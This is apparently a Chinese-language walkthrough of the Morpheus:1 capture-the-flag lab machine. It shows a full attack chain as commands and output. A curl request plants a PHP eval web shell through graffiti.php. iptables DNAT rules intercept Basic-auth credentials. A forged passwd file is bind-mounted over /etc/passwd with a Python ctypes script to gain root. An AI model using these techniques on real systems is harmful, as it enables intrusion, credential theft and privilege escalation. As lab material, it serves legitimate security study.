前言 #
之前的文章虽然写过这一个机器,但是却不是预期路线,这里重新打一遍
Nmap #
[root@Hacking] /home/kali/Matrix
❯ nmap 192.168.237.173 -A -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 09:07 CST
Nmap scan report for 192.168.237.173
Host is up (0.00032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_ 256 aa:83:c3:51:78:61:70:e5:b7:46:9f:07:c4:ba:31:e4 (ECDSA)
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Morpheus:1
81/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Meeting Place
|_http-title: 401 Authorization Required
Feroxbuster #
[root@Hacking] /home/kali/Matrix
❯ feroxbuster -u 'http://192.168.237.173/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.237.173/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [txt, php]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 175l 1014w 78508c http://192.168.237.173/trinity.jpeg
200 GET 15l 45w 348c http://192.168.237.173/
301 GET 9l 28w 323c http://192.168.237.173/javascript => http://192.168.237.173/javascript/
200 GET 1l 7w 47c http://192.168.237.173/robots.txt
200 GET 4l 27w 139c http://192.168.237.173/graffiti.txt
200 GET 24l 56w 451c http://192.168.237.173/graffiti.php
301 GET 9l 28w 330c http://192.168.237.173/javascript/jquery => http://192.168.237.173/javascript/jquery/
200 GET 10870l 44283w 287600c http://192.168.237.173/javascript/jquery/jquery
[####################] - 3m 1984956/1984956 0s found:8 errors:0
[####################] - 3m 661638/661638 4125/s http://192.168.237.173/
[####################] - 3m 661638/661638 3743/s http://192.168.237.173/javascript/
[####################] - 3m 661638/661638 4219/s http://192.168.237.173/javascript/jquery/
发现一个特殊的graffiti.txt和graffiti.php
www-data #
[root@Hacking] /home/kali/Matrix
❯ curl -X POST 'http://192.168.237.173/graffiti.php' -d 'message=<?php eval($_POST[a]);?>&file=shell.php'
<h1>
<center>
Nebuchadnezzar Graffiti Wall
</center>
</h1>
<p>
<?php eval($_POST[a]);?>
<br>
<br>
<p>
Enter message:
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>
然后成功写入
FLAG 1 #
www-data@morpheus:/$ cat FLAG.txt
Flag 1!
You've gotten onto the system. Now why has Cypher locked everyone out of it?
Can you find a way to get Cypher's password? It seems like he gave it to
Agent Smith, so Smith could figure out where to meet him.
Also, pull this image from the webserver on port 80 to get a flag.
/.cypher-neo.png
好像这个png没啥东西。在定时任务里发现了一个chown命令,这个命令会递归设置拥有者为root
www-data@morpheus:/$ cat /etc/cron.d/fix-ownership-on-crew
* * * * * root chown -R root /crew
Linpeas #
再跑一下linpeas,发现当前存在docker环境,但是另一台172.17.0.2没有端口开放
/usr/sbin/xtables-legacy-multi 是一个 多功能二进制,它包含了 iptables / ip6tables / 保存/恢复规则等工具 的“统一入口“。换句话说这个东西可以对列表中的工具进行控制
iptables 是 Linux 系统下的 防火墙工具,用于配置 内核的网络数据包过滤规则。它允许你控制哪些网络流量可以进入或离开系统,当然也允许转发。
回到之前的端口扫描结果中,有个81端口开放了认证服务,那么可以合理地猜测有人会在81端口进行登录,并且我们可以将流量转发到自己可以看到的地方。
IPtables #
一般来说www-data是看不了iptables的,但是这里实际上可以查看,并且还可以修改规则
www-data@morpheus:/tmp$ iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy DROP)
target prot opt source destination
DOCKER-USER all -- anywhere anywhere
DOCKER-ISOLATION-STAGE-1 all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
DOCKER all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain DOCKER (1 references)
target prot opt source destination
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target prot opt source destination
DOCKER-ISOLATION-STAGE-2 all -- anywhere anywhere
RETURN all -- anywhere anywhere
Chain DOCKER-ISOLATION-STAGE-2 (1 references)
target prot opt source destination
DROP all -- anywhere anywhere
RETURN all -- anywhere anywhere
Chain DOCKER-USER (1 references)
target prot opt source destination
RETURN all -- anywhere anywhere
因此可以直接流量重定向到本地另一个端口,然后监听
这里肯定要用dnat对目的地址转换,改变数据包的目的地址。结合之前的docker环境,可以猜测得到数据包应该是172.17.0.2发到172.17.0.1的。
iptables -A FORWARD -p tcp -d 172.17.0.1 --dport 81 -j ACCEPT
iptables -A PREROUTING -t nat -i docker0 -p tcp --dport 81 -j DNAT --to 172.17.0.1:8080
cypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist
拿到flag
Root #
查看用户组发现有一个humans,并且之前的/crew所属组也是humans
cypher@morpheus:~$ id
uid=1001(cypher) gid=1001(cypher) groups=1001(cypher),1002(humans)
cypher@morpheus:~$ ls -al /crew/
total 8
drwxrwxr-x 2 root humans 4096 Oct 28 2021 .
drwxr-xr-x 19 root root 4096 Oct 28 2021 ..
但是就算是提前设置SUID,被chown之后会重置。但是另一个之前看到过的python3-9似乎可以利用
准备一个新的passwd文件,这里我只改了最后一行的UID和GID让cypher等同于root
cypher@morpheus:~$ cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nginx:x:999:999:nginx:/var/nginx:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
uuidd:x:102:102::/run/uuidd:/usr/sbin/nologin
tcpdump:x:103:103::/nonexistent:/usr/sbin/nologin
_chrony:x:104:104:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
systemd-network:x:105:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:106:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
trinity:x:1000:1000::/home/trinity:/bin/bash
cypher:x:0:0::/root:/bin/bash
然后写一个python脚本
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/cypher/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)
可以看到修改成功
